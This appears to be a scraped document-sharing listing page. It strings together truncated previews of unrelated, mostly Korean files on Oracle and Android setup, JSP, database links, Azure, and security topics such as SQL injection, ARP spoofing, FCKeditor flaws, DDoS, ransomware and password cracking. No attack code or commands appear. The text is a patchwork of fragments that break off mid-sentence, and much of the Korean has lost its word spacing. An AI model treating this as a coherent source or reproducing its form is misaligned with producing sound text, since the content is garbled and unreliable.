ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration

More information

untitled

untitled WebKnight 설치 운영 FAQ Q. WebKnight 설치 후 정상적인 서비스 접속이 차단되고 WebKnight 경고창이 뜹 니다. A. WebKnight 의기본설정은상당히엄격하게되어있어정상적인웹접속요청이차단될수있습니다. 따라서, 설치후 WebKnight 설정을로깅모드로전환한후룰을최적화시키는과정이필요합니다. 먼저, Config.exe 를실행하여 Incident

More information

Microsoft PowerPoint - 02_Linux_Fedora_Core_8_Vmware_Installation [호환 모드]

Microsoft PowerPoint - 02_Linux_Fedora_Core_8_Vmware_Installation [호환 모드] 리눅스 설치 Vmware를 이용한 Fedora Core 8 설치 소프트웨어실습 1 Contents 가상 머신 실습 환경 구축 Fedora Core 8 설치 가상 머신 가상 머신 가상 머신의 개념 VMware의 설치 VMware : 가상 머신 생성 VMware의 특징 실습 환경 구축 실습 환경 구축 Fedora Core 8 설치 가상 머신의 개념 가상 머신 (Virtual

More information

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse

More information

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher( 실행할페이지.jsp); 다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher

More information

단계

단계 본문서에서는 Tibero RDBMS 에서제공하는 Oracle DB Link 를위한 gateway 설치및설정방법과 Oracle DB Link 사용법을소개한다. Contents 1. TIBERO TO ORACLE DB LINK 개요... 3 1.1. GATEWAY 란... 3 1.2. ORACLE GATEWAY... 3 1.3. GATEWAY 디렉터리구조...

More information

웹사이트 운영, 이보다 쉬울 수 없다! Microsoft Azure를 이용한 웹사이트 구축

웹사이트 운영, 이보다 쉬울 수 없다!  Microsoft Azure를  이용한 웹사이트 구축 2014 년 4 월 IaaS 는기본, PaaS 로도약. Microsoft Azure! Session 1 웹사이트운영, 이보다쉬울수없다! Microsoft Azure 를이용한웹사이트의구축 - 한국마이크로소프트이건복이사 목차 Azure Web Sites의정의아키텍처구성규모조정 / 배포 / 디버깅 / Web Jobs About Me? 이건복 kblee@microsoft.com

More information

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

개인정보보호의  이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호- 개인정보보호의 이해및안전한관리 - 개인 PC 및스마트폰개인정보보호 - 2012. 12. 12 최윤형 ( 한국정보화진흥원 ) 1 안전한개인 PC 관리방법 목 차 2 안전한스마트폰관리방법 1. 안전한개인 PC 관리방법 정보통신기기의보안위협요인 웜, 바이러스, 악성코드, DDos 공격침입, 네트워크공격 휴대성, 이동성오픈플랫폼 3G, WiFi, Wibro 등 웜,

More information

제목 레이아웃

제목 레이아웃 웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya

More information

58-4 209 TEL XXXXXXXX FAX XXXXXXXX www.moca.go.kr Tel XXXXXXX ISSN 1975-6054 (http://www.moca.go.kr)

58-4 209 TEL XXXXXXXX FAX XXXXXXXX www.moca.go.kr Tel XXXXXXX ISSN 1975-6054 (http://www.moca.go.kr) ANNUAL REPORT OF 58-4 209 TEL XXXXXXXX FAX XXXXXXXX www.moca.go.kr Tel XXXXXXX ISSN 1975-6054 (http://www.moca.go.kr) CONTENTS ANNUAL REPORT OF 321 3 322 5 323 8 11 16 28 36 335 353 47 60 71 84 120 145

More information

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷 인터넷비즈니스의안심코드, AhnLab Online Security 2.0 멀티브라우저지원! 블루투스키보드지원! 메모리해킹방어! 웹페이지변조및스크린캡처차단! 정보유출걱정없이비즈니스가완성됩니다 보안전용브라우저 AOS Secure Browser 키보드보안서비스 AOS anti-keylogger 온라인 PC 방화벽 AOS firewall 온라인통합방역서비스 AOS

More information

*2월완결

*2월완결 Part 1 Part 2 Part 3 월간특집 3. ARP Spoofing 공격및대책 1. ARP Spoofing 공격개요 최근해외로부터의홈페이지해킹후악성코드를삽입하는사건들이다수발생되고있는데, 이사고들은대부분해당웹서버가직접해킹당한후악성코드가삽입되어졌다. 그런데, 최근들어웹서버는전혀해킹을당하지않았음에도불구하고해당웹서버로부터악성코드가다운로드되는사건이발생했다. 이사건은공격자가동일한

More information

Keil Flexlm 라이선스 설명서

Keil Flexlm 라이선스 설명서 Copyright 2013 EMThink. All rights reserved. Date: 13 年 8 月 14 日 목차 라이선스서버의 HOSTID 찾기...3 라이선스파일만들기...5 라이선스서버프로그램다운로드하기...5 라이선스서버프로그램설치하기...6 라이선스파일수정하기...6 라이선스서버프로그램시작하기...7 라이선스서버프로그램종료하기...9 Page

More information

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아 LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml

More information

<31305FBEC6C0CCC5DB2E687770>

<31305FBEC6C0CCC5DB2E687770> 1. 개요분산서비스거부공격 (Distribute Denial of Service) 은공격의대상이되는서버에서비스장애를 발생시킬뿐만아니라, 네트워크의안정성에도위협이되고있으므로각별한주의가필요하다. 최근, 실제로국내인터넷사용 PC가분산서비스거부공격 (DDoS) 을위한 Agent 로악용되어대량의트래픽을발생하여, 국내일부게임아이템거래사이트에서비스장애를유발시킨사고가발생하였다.

More information

슬라이드 1

슬라이드 1 웹사이트를이용한 랜섬웨어공격과대응방안 발표자 : 유엠브이기술김상민상무 2016 년 01 월 27 일 목차 - 랜섬웨어! 웹과만나다. - 웹해킹! 랜섬웨어의은밀한침투 - 웹해킹! 어떻게방어할것인가? - 웹해킹! 보안솔루션소개 - 맺음말 랜섬웨어! 웹과만나다. 랜섬웨어어떻게감염되는가? 2015 년랜섬웨어감염경로별통계 ( 출처 : 한국랜섬웨어침해대응센터 ) [ 3

More information

Microsoft Word FCKeditor.doc

Microsoft Word FCKeditor.doc FCKeditor 취약점분석 머리말 본문서에서는 FCKeditor 의취약점에대해설명하고해당취약점에대한대응책을소개하는자료입니 다. 본문서는웹해킹에대한일반적인지식이있는보안전문가를대상으로작성되었습니다. 따라서, 웹 해킹에대한기본적인기술에대해서는별도로설명하지않습니다. 등록상표 PIOLINK 는 파이오링크의등록상표입니다. 일러두기 본사용설명서의저작권은 파이오링크에있습니다.

More information

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드] Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google

More information

6. 설치가시작되는동안 USB 드라이버가자동으로로드됩니다. USB 드라이버가성공적으로로드되면 Setup is starting( 설치가시작되는중 )... 화면이표시됩니다. 7. 화면지침에따라 Windows 7 설치를완료합니다. 방법 2: 수정된 Windows 7 ISO

6. 설치가시작되는동안 USB 드라이버가자동으로로드됩니다. USB 드라이버가성공적으로로드되면 Setup is starting( 설치가시작되는중 )... 화면이표시됩니다. 7. 화면지침에따라 Windows 7 설치를완료합니다. 방법 2: 수정된 Windows 7 ISO Windows 7 설치및 PCIE RAID 설정정보 DK173 초판 11월 2016 A. Windows 7 및 USB 드라이버설치 칩셋사양에따라 Windows 7 설치중에 USB 키보드 / 마우스를사용하려면시스템에서 USB 드라이버를사전로드해야합니다. 이절에서는 USB 드라이버사전로드방법과 Windows 7 설치방법에대해서설명합니다. 방법 1: SATA ODD

More information

좀비PC

좀비PC 1. 수집 단계 1.1 개요 공공기관이 당 기관의 업무 수행을 위해 특정 목적으로 정보주체의 동의 및 법률적 근거로 를 적법하고 정당하게 수집하는 과정 및 절차를 의미 웹사이트에 회원 가입 시 주민등록번호, 이름, 주소, 직장, 이메일 등을 입력하는 과정은 의 수집 단계에 해당됨 1.2 침해유형 및 보호조치의 필요성 수집 단계에서의 대표적 침해유형은 본인 확인시

More information

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection

More information

2012/02/CE/11/V07 윈도우즈패스워드크래킹 2012 학년도 2 학기 프로젝트특강보고서 프로젝트명 : 윈도우즈패스워드크래킹 ( 컴공 D-2 ) 2012 년 11 월 20 일 지도교수 : 문준현교수님 학과 : 컴퓨터공학과 7팀제출자 : 역할성명학번 조장 정진수

2012/02/CE/11/V07 윈도우즈패스워드크래킹 2012 학년도 2 학기 프로젝트특강보고서 프로젝트명 : 윈도우즈패스워드크래킹 ( 컴공 D-2 ) 2012 년 11 월 20 일 지도교수 : 문준현교수님 학과 : 컴퓨터공학과 7팀제출자 : 역할성명학번 조장 정진수 윈도우즈패스워드크래킹 2012 학년도 2 학기 프로젝트특강보고서 프로젝트명 : 윈도우즈패스워드크래킹 ( 컴공 D-2 ) 2012 년 11 월 20 일 지도교수 : 문준현교수님 학과 : 컴퓨터공학과 7팀제출자 : 역할성명학번 조장 정진수 2006211005 조원 권기범 2008271041 신종원 2011251073 정윤희 2011251099 컴퓨터공학과 71

More information

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우. 소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423

More information

INDEX 1. 개요 데이터백업스크립트작성 crontab 을이용한자동백업예약 활용 - 다른서버에백업하기

INDEX 1. 개요 데이터백업스크립트작성 crontab 을이용한자동백업예약 활용 - 다른서버에백업하기 Linux Server - Data Backup - Copyright @ 2011 Good Internet 소 속 IDC실 이 름 정명구매니저 E-mail tech@tongkni.co.kr - 1 - INDEX 1. 개요... 3 2. 데이터백업스크립트작성.... 4 3. crontab 을이용한자동백업예약.... 7 4. 활용 - 다른서버에백업하기.... 10-2

More information

벤처연구사업(전동휠체어) 평가

벤처연구사업(전동휠체어) 평가 운영체제실습 Raspbian 설치 2019. 3 표월성 wspyo74@naver.com cherub.sungkyul.ac.kr 목차 Ⅰ. 개요 1. 설치전준비시항 - H/W 및 S/W - Raspbian 이미지파일 2. 라즈비안 (Raspbian) 설치 - Destop 설치 ( 가상화시스템이용 ) - NOOBS를이용한설치 - Raspbian 이미지를이용한설치

More information

BEA_WebLogic.hwp

BEA_WebLogic.hwp BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법

More information

untitled

untitled 보안서버구축가이드 8 Ⅲ. SSL 방식보안서버구축하기 1. 소개및보안서버구축절차 가. 개요 SSL은 Secure Sockets Layer의머리글이며, 1994년 Netscape에의해전세계적인표준보안기술이개발되었습니다. SSL 방식은웹브라우저와서버간의통신에서정보를암호화함으로써도중에해킹을통해정보가유출되더라도정보의내용을보호할수있는기능을갖춘보안솔루션으로전세계적으로수백만개의웹사이트에서사용하고있습니다.

More information

#HNS-WI 금융권및포털사이트이용자대상악성코드및공격기법분석 (v0.1 공개버전 )

#HNS-WI 금융권및포털사이트이용자대상악성코드및공격기법분석 (v0.1 공개버전 ) #HNS-WI-14-02 금융권및포털사이트이용자대상악성코드및공격기법분석 (v0.1 공개버전 ) 2014-01-14 내용요약 이보고서는최근국내금융권과포털사이트이용자들을대상으로한 악성코드공격에서발견된주목할부분을정리및분석한것임 공격자가노린하이재킹대상국내웹사이트들은국민은행, 농협, 신한은행, 우리은행, 기업은행, 외환은행, 하나은행, 우체국, 새마을금고, 네이버,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Spider For MySQL 실전사용기 피망플러스유닛최윤묵 Spider For MySQL Data Sharding By Spider Storage Engine http://spiderformysql.com/ 성능 8 만 / 분 X 4 대 32 만 / 분 많은 DB 중에왜 spider 를? Source: 클라우드컴퓨팅구 선택의기로 Consistency RDBMS

More information